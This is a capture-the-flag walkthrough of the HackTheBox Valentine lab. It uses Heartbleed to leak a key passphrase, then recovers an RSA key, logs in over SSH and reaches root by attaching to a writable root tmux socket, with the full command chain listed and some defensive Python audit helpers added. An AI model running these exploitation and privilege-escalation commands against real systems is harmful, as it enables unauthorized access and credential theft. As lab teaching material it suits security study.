We used the HackTheBox Valentine machine to demonstrate the Heartbleed vulnerability and privilege escalation through the tmux terminal multiplexer. Valentine is a unique medium-difficulty machine built around Heartbleed, a bug that had a devastating impact on systems across the globe.

Heartbleed Vulnerability Exploitation

My initial step was to exploit the Heartbleed vulnerability.

  • The machine was running an older version of OpenSSL, making it susceptible to Heartbleed.
  • This vulnerability let me send a malformed heartbeat request to the server, and in return the server responded with chunks of its process memory.
  • By exploiting Heartbleed, I managed to reveal a Base64-encoded string.
  • Decoding this string gave me the passphrase for an RSA private key.
  • I explored multiple ways to test for and exploit Heartbleed:
    • Using an Nmap script: nmap --script ssl-heartbleed <target_ip> -p 443
    • Using the ssl-scan tool: ssl-scan --heartbleed <target_ip>
    • Using a Python exploit script I found via searchsploit, run as: python heartbleed.py 10.10.10.79
  • To automate extracting useful data, I ran the exploit in a Bash for loop and piped the output through grep -v "00000000" to drop the all-zero lines of the hex dump (memory that held nothing of interest).
  • Once I had the Base64 string, I decoded it with: echo "<base64_string>" | base64 -d
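As an added example (not code from this write-up or from the tools it mentions), here is a small Python triage helper for the first bullet above: it pulls an OpenSSL version out of a banner and classifies it against the upstream release range that Heartbleed affected. The banners in it are constructed, and the docstring's caveat about distribution backports is why a version match is only a hint that an active check such as the nmap script above should confirm.

```python
import re
from typing import Optional

# Upstream OpenSSL releases affected by Heartbleed: 1.0.1 through 1.0.1f, plus the
# 1.0.2-beta1 pre-release; 1.0.1g carried the fix (a known fact, not from the write-up).
LAST_VULNERABLE_LETTER = "f"

VERSION_RE = re.compile(
    r"OpenSSL[ /]?(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+)"
    r"(?P<letter>[a-z]?)(?:-(?P<pre>beta\d+))?"
)


def parse_openssl_version(banner: str) -> Optional[dict]:
    """Pull an OpenSSL version out of free text: an HTTP Server header,
    `openssl version` output, or a package listing. Returns None if absent."""
    m = VERSION_RE.search(banner)
    if m is None:
        return None
    return {
        "major": int(m["major"]),
        "minor": int(m["minor"]),
        "patch": int(m["patch"]),
        "letter": m["letter"],
        "pre": m["pre"],
    }


def heartbleed_status(banner: str) -> str:
    """Classify a banner as 'vulnerable', 'fixed', 'not-affected' or 'unknown'.

    'vulnerable' means the *upstream* version falls in the affected range. Distributions
    backport fixes without bumping the version (a patched 1.0.1e package still says 1.0.1e),
    so treat the result as a triage hint to confirm with an active probe such as
    nmap --script ssl-heartbleed, not as proof either way.
    """
    v = parse_openssl_version(banner)
    if v is None:
        return "unknown"
    base = (v["major"], v["minor"], v["patch"])
    if base < (1, 0, 1):
        return "not-affected"   # 0.9.8 and 1.0.0 predate the heartbeat extension code
    if base == (1, 0, 1):
        if v["pre"]:
            return "unknown"    # 1.0.1 betas are not tracked here
        return "vulnerable" if v["letter"] <= LAST_VULNERABLE_LETTER else "fixed"
    if base == (1, 0, 2) and v["pre"] == "beta1":
        return "vulnerable"
    return "fixed"              # 1.0.2-beta2 and everything later ships with the fix


if __name__ == "__main__":
    # Constructed banners, not captured from any host.
    for banner in [
        "Apache/2.2.22 (Ubuntu) OpenSSL/1.0.1e",
        "OpenSSL 1.0.1g 7 Apr 2014",
        "OpenSSL 1.0.2-beta1",
        "OpenSSL 1.0.0k",
        "nginx/1.18.0",
    ]:
        print(f"{heartbleed_status(banner):13} {banner}")
```

The regex only treats a `-betaN` suffix as a pre-release marker, so a distribution package string such as `1.0.1e-3ubuntu2` still resolves to the upstream 1.0.1e and lands in "vulnerable"; that is deliberate, since the whole point of the classification is to queue hosts for an active check rather than to clear them.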

Directory Brute-forcing and RSA Key Discovery

After obtaining the password, my next step was to find the RSA private key.

  • I performed directory brute-forcing with gobuster. My command looked like this: sudo gobuster dir -u http://10.10.10.79 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
  • This revealed a directory named /dev/ containing a file called hype.key with hex-encoded content.
  • I downloaded the file with wget https://<target_ip>/dev/hype.key --no-check-certificate (the flag skips TLS certificate validation for the lab host).
  • To decode the hex content back into an ASCII PEM-encoded RSA private key, I used xxd: cat hype.key | xxd -r -p > rsa_encrypted
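The xxd step above, as an added Python example (not code from the write-up): hex_to_bytes reverses a plain hex dump the way xxd -r -p does, and inspect_pem reports whether the result is a PEM block and whether its legacy Proc-Type/DEK-Info headers mark it as passphrase-protected, which is what tells you an OpenSSL decryption step will be needed before the key is usable. The sample key is constructed with a placeholder body; it is not the machine's hype.key.

```python
import re

# Constructed sample: a PEM header block with a placeholder body, hex-encoded the way
# `xxd -p` would emit it (xxd wraps at 60 characters; any whitespace layout decodes the same).
SAMPLE_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n"
    "\n"
    "PLACEHOLDERKEYBODYNOTAREALKEY\n"
    "-----END RSA PRIVATE KEY-----\n"
)
SAMPLE_HEX = " ".join(f"{b:02x}" for b in SAMPLE_PEM.encode())


def hex_to_bytes(text: str) -> bytes:
    """Decode a plain hex dump. Whitespace is ignored like `xxd -r -p` does, but
    unlike xxd (which silently skips junk) any other non-hex character is an error,
    so a truncated or mangled download fails loudly instead of yielding garbage."""
    compact = "".join(text.split())
    if not re.fullmatch(r"[0-9a-fA-F]*", compact):
        raise ValueError("non-hex characters in input")
    if len(compact) % 2:
        raise ValueError("odd number of hex digits")
    return bytes.fromhex(compact)


PEM_RE = re.compile(
    r"-----BEGIN (?P<label>[A-Z ]+)-----\r?\n(?P<body>.*?)-----END (?P=label)-----",
    re.S,
)


def inspect_pem(data: bytes) -> dict:
    """Report what a decoded blob is and whether it is passphrase-protected.

    Legacy OpenSSL key encryption is signalled by 'Proc-Type: 4,ENCRYPTED' plus a
    'DEK-Info' line naming the cipher; PKCS#8 encrypted keys use the
    'ENCRYPTED PRIVATE KEY' label instead.
    """
    text = data.decode("ascii", errors="replace")
    m = PEM_RE.search(text)
    if m is None:
        return {"valid": False}
    headers = {}
    for line in m["body"].splitlines():
        if ":" not in line:
            break  # headers end at the first blank or base64 line
        key, _, value = line.partition(":")
        headers[key.strip()] = value.strip()
    encrypted = (
        headers.get("Proc-Type", "").endswith("ENCRYPTED")
        or m["label"] == "ENCRYPTED PRIVATE KEY"
    )
    return {
        "valid": True,
        "label": m["label"],
        "encrypted": encrypted,
        "cipher": headers.get("DEK-Info", "").split(",")[0] or None,
    }


if __name__ == "__main__":
    print(inspect_pem(hex_to_bytes(SAMPLE_HEX)))
```

A result with encrypted set is the cue for the openssl rsa step in the next section; an unencrypted "RSA PRIVATE KEY" or "OPENSSH PRIVATE KEY" block can be handed to ssh -i directly.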

SSH Access

With the encrypted RSA key and its password, I could finally gain SSH access.

  • I used the passphrase I found earlier to decrypt the RSA private key with OpenSSL: openssl rsa -in rsa_encrypted -out rsa_decrypted (OpenSSL prompts for the passphrase).
  • Then I used the decrypted private key to log in via SSH as the user “hype”: ssh -i rsa_decrypted hype@10.10.10.79. SSH refuses a key file that other users can read, so run chmod 600 on the key file first if needed.
  • Once logged in, I checked the system information with uname -a.

Privilege Escalation via Tmux

Now that I had a user shell, my focus shifted to privilege escalation.

  • I investigated running processes with ps aux | grep tmux and found a tmux session running as root. Its socket was located at /dev/dev_session.
  • I checked the permissions of the tmux socket file with ls -la /dev/ and discovered that the “hype” user had write access to it. Connecting to a UNIX socket requires write permission on the socket file, so that bit is exactly what makes the session reachable.
  • By attaching to that existing tmux server, I effectively gained a root shell. The command I used was: tmux -S /dev/dev_session
  • From there, I navigated to the root directory (cd /root) and retrieved the root.txt flag with cat root.txt.
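The misconfiguration above, seen from the auditing side, as an added Python example (not part of the write-up): a check that walks the directories where tmux-style sockets usually live and reports root-owned UNIX sockets that the group or other users can write to, since connect() on a UNIX socket needs write permission on the socket file. The default search roots and the privileged-UID list are assumptions for this example, not values from the machine.

```python
import os
import stat
from typing import Iterator, NamedTuple


class ExposedSocket(NamedTuple):
    path: str
    mode: str        # e.g. "srwxrwxrwx", as ls -l would print it
    owner_uid: int


def socket_is_exposed(st_mode: int, st_uid: int, privileged_uids=(0,)) -> bool:
    """True when a UNIX socket owned by a privileged user is writable by its group
    or by everyone. Write permission on the socket file is what connect() checks,
    so a root-owned tmux socket with group/other write is attachable by any local
    user in that group, or by anyone at all."""
    if not stat.S_ISSOCK(st_mode):
        return False
    if st_uid not in privileged_uids:
        return False
    return bool(st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_exposed_sockets(
    roots=("/tmp", "/dev", "/var/run"),   # assumed defaults: usual homes for tmux sockets
    privileged_uids=(0,),
) -> Iterator[ExposedSocket]:
    """Walk the given directories and yield every socket that fails the check."""
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
            for name in filenames:          # os.walk lists sockets among the filenames
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)     # lstat: never follow a symlink to a socket
                except OSError:
                    continue
                if socket_is_exposed(st.st_mode, st.st_uid, privileged_uids):
                    yield ExposedSocket(path, stat.filemode(st.st_mode), st.st_uid)


if __name__ == "__main__":
    for hit in find_exposed_sockets():
        print(f"{hit.mode} uid={hit.owner_uid} {hit.path}")
```

The fix on the tmux side is the usual one for any privileged socket: keep the socket in a directory and with a mode only its owner can write (tmux's default of a per-user directory under /tmp with mode 700 does this), and never loosen it to let another account "share" the session.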

Technical Commands I Used:

Here’s a comprehensive list of the commands I used or referenced during the walkthrough:

  • Nmap:
    • nmap <target_ip>
    • nmap --script ssl-heartbleed <target_ip> -p 443
  • SSLScan (or SSLyze):
    • sslyze --heartbleed <target_ip>
  • SearchSploit:
    • searchsploit heartbleed
    • searchsploit -m <exploit_path>
  • Python (for running exploits):
    • python <exploit_script.py> <target_ip>
    • python heartbleed.py 10.10.10.79
  • Grep:
    • grep -v "00000000"
  • Bash For Loop:
    • for i in $(seq 1 100); do python <exploit.py> <target_ip> | grep -v "00000000" > output$i; done
  • Echo and Base64:
    • echo "<base64_string>" | base64 -d
  • GoBuster:
    • sudo gobuster dir -u http://10.10.10.79 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
  • Wget:
    • wget https://<target_ip>/dev/hype.key --no-check-certificate
  • Cat:
    • cat hype.key
  • xxd:
    • cat hype.key | xxd -r -p
    • cat hype.key | xxd -r -p > rsa_encrypted
  • OpenSSL:
    • openssl rsa -in rsa_encrypted -out rsa_decrypted
  • SSH:
    • ssh -i rsa_decrypted hype@10.10.10.79
  • uname:
    • uname -a
  • ps:
    • ps aux | grep tmux
  • ls:
    • ls -la /dev/
  • Tmux:
    • tmux -S /dev/dev_session
  • cd:
    • cd /root
  • cat (for flag):
    • cat root.txt
  • Curl (seen in the root flag content):
    • curl -i -X POST -A "..." http://<target_ip>/decode.php --cookie "..." --data-binary "text=..." -o /dev/null

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.